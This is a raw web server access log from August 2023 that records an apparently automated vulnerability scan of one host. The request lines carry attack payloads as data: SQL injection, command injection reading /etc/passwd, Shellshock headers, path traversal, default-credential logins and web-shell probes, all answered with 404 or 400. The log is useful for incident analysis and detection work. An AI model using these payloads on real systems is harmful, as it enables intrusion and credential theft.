2023-08-04 16:05:42 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 123
2023-08-04 16:05:50 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 63
2023-08-04 16:05:58 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 58
2023-08-04 16:06:07 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 110
2023-08-04 16:06:15 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 412
2023-08-04 16:06:23 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 119
2023-08-04 16:06:30 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 57
2023-08-04 16:06:37 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 57
2023-08-04 16:06:44 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 95
2023-08-04 16:06:51 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 106
2023-08-04 16:06:56 103.153.214.94 GET / - 8172 - 162.142.125.223 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 7 0 234
2023-08-04 16:06:58 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 108
2023-08-04 16:07:05 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 60
2023-08-04 16:07:12 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 88
2023-08-04 16:07:19 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 60
2023-08-04 16:07:27 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 87
2023-08-04 16:07:37 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 67
2023-08-04 16:07:45 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 94
2023-08-04 16:07:53 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 102
2023-08-04 16:08:01 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 93
2023-08-04 16:08:09 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 111
2023-08-04 16:08:18 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 114
2023-08-04 16:08:26 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 116
2023-08-04 16:08:34 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 120
2023-08-04 16:08:40 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 94
2023-08-04 16:08:47 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 53
2023-08-04 16:08:54 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 116
2023-08-04 16:09:01 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 113
2023-08-04 16:09:08 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 96
2023-08-04 16:09:14 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 83
2023-08-04 16:09:22 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 92
2023-08-04 16:09:29 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 130
2023-08-04 16:09:36 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 98
2023-08-04 16:09:44 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 63
2023-08-04 16:09:52 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 100
2023-08-04 16:16:19 103.153.214.94 POST /cgi-bin/mt/mt-xmlrpc.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 119
2023-08-04 16:19:54 103.153.214.94 POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 91
2023-08-04 16:20:02 103.153.214.94 GET /wp-content/uploads/2TSGV8dWGoklKbxJMWGgIaZrcPQ.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 117
2023-08-04 16:21:02 103.153.214.94 POST /wsman - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 113
2023-08-04 16:24:28 103.153.214.94 GET /mifs/aad/api/v2/admins/users - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 101
2023-08-04 16:30:32 103.153.214.94 POST /j_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 90
2023-08-04 16:33:23 103.153.214.94 POST /(download)/tmp/poc.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 78
2023-08-04 16:40:51 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 99
2023-08-04 16:41:44 103.153.214.94 GET / rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 94
2023-08-04 16:41:51 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 58
2023-08-04 16:42:46 103.153.214.94 GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 91
2023-08-04 16:47:07 103.153.214.94 POST /PDC/ajaxreq.php PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 84
2023-08-04 16:54:22 103.153.214.94 GET /dashboard/view-chair-list.php table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 100
2023-08-04 16:59:40 103.153.214.94 GET /login redirect=%2F 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 89
2023-08-04 17:03:39 103.153.214.94 POST /aspera/faspex/package_relay/relay_package - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 80
2023-08-04 17:09:38 103.153.214.94 POST /user/register element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 bcvt.kontum.gov.vn:8172/user/register 404 7 0 90
2023-08-04 17:16:03 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 81
2023-08-04 17:16:49 103.153.214.94 GET /glpi/scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 104
2023-08-04 17:16:58 103.153.214.94 GET /scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 81
2023-08-04 17:20:50 103.153.214.94 GET /login login=lutron&password=lutron 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 87
2023-08-04 17:29:18 103.153.214.94 GET /card_scan.php No=123&ReaderNo=`sleep%207`&CardFormatNo=123 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 87
2023-08-04 17:34:06 103.153.214.94 GET /latest/meta-data/ - 8172 - 111.90.143.37 - - 404 7 0 84
2023-08-04 17:34:12 103.153.214.94 GET /latest/meta-data/ - 8172 - 111.90.143.37 - - 404 7 0 89
2023-08-04 17:34:26 103.153.214.94 GET /latest/meta-data/ - 8172 - 111.90.143.37 - - 404 7 0 63
2023-08-04 17:34:49 103.153.214.94 POST /jeecg-boot/jmreport/qurestSql - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 61
2023-08-04 17:40:02 103.153.214.94 POST /wp-json/am-member/license - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 63
2023-08-04 17:45:57 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 85
2023-08-04 17:46:04 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 8172 - 111.90.143.37 Nacos-Server - 404 7 0 86
2023-08-04 17:48:03 103.153.214.94 GET /InsightPluginShowGeneralConfiguration.jspa; - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 118
2023-08-04 17:52:42 103.153.214.94 GET /php/ping.php hostname=|dir 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 85
2023-08-04 18:05:42 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 93
2023-08-04 18:05:45 103.153.214.94 POST /forms/doLogin - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 78
2023-08-04 18:05:49 103.153.214.94 GET / rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 59
2023-08-04 18:05:53 103.153.214.94 GET /wp-content/uploads/workreap-temp/2TSGVF6EOYS7nlzjZyGXa63pd7w.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 84
2023-08-04 18:07:52 103.153.214.94 GET /jquery-file-upload/server/php/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 90
2023-08-04 18:16:02 103.153.214.94 GET /api/sms_check.php param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5(999999999)),0x7e),1)--%20 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 60
2023-08-04 18:19:57 103.153.214.94 GET /query db=db&q=SHOW%20DATABASES 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 85
2023-08-04 18:26:12 103.153.214.94 POST /api/v1/method.callAnon/getPasswordPolicy - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 62
2023-08-04 18:26:19 103.153.214.94 POST /login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.jsp 404 7 0 54
2023-08-04 18:34:33 103.153.214.94 GET /about_state - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 74
2023-08-04 18:36:37 103.153.214.94 GET /GallerySite/filesrc/fotoilan/388/middle/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 400 0 0 89
2023-08-04 18:48:20 103.153.214.94 POST /classes/Login.php f=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 84
2023-08-04 18:48:24 103.153.214.94 GET /admin/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 76
2023-08-04 18:59:50 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 92
2023-08-04 18:59:54 103.153.214.94 GET /cgi-bin/status - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 73
2023-08-04 18:59:57 103.153.214.94 GET /cgi-bin/stats - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 59
2023-08-04 19:00:02 103.153.214.94 GET /cgi-bin/test - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 54
2023-08-04 19:00:06 103.153.214.94 GET /cgi-bin/status/status.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 76
2023-08-04 19:00:10 103.153.214.94 GET /test.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 81
2023-08-04 19:00:13 103.153.214.94 GET /debug.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 82
2023-08-04 19:00:15 103.153.214.94 GET /cgi-bin/test-cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 56
2023-08-04 19:04:37 103.153.214.94 POST /artifactory/ui/auth/login _spring_security_remember_me=false 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn:8172/artifactory/webapp/ 404 7 0 80
2023-08-04 19:06:52 103.153.214.94 GET /nette.micro/ callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 86
2023-08-04 19:15:54 103.153.214.94 GET /html/log - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 72
2023-08-04 19:18:00 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 87
2023-08-04 19:28:54 103.153.214.94 GET /admin/ajax/avatar.php id=-1+union+select+md5(999999999)%23 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 86
2023-08-04 19:31:55 103.153.214.94 GET /login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 85
2023-08-04 19:36:34 103.153.214.94 GET / - 8172 - 87.236.176.117 Mozilla/5.0+(compatible;+InternetMeasurement/1.0;++https://internet-measurement.com/) - 404 7 0 341
2023-08-04 19:43:28 103.153.214.94 GET /index.php option=com_imagebrowser&folder=../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 69
2023-08-04 19:44:20 103.153.214.94 POST /pages/createpage-entervariables.action SpaceKey=x 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 83
2023-08-04 19:44:28 103.153.214.94 POST /pages/createpage-entervariables.action - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 76
2023-08-04 19:44:35 103.153.214.94 POST /confluence/pages/createpage-entervariables.action SpaceKey=x 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 78
2023-08-04 19:44:41 103.153.214.94 POST /confluence/pages/createpage-entervariables.action - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 87
2023-08-04 19:44:47 103.153.214.94 POST /wiki/pages/createpage-entervariables.action SpaceKey=x 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 78
2023-08-04 19:44:54 103.153.214.94 POST /wiki/pages/createpage-entervariables.action - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 76
2023-08-04 19:45:00 103.153.214.94 POST /pages/doenterpagevariables.action - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 67
2023-08-04 19:45:05 103.153.214.94 POST /pages/createpage.action spaceKey=myproj 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 83
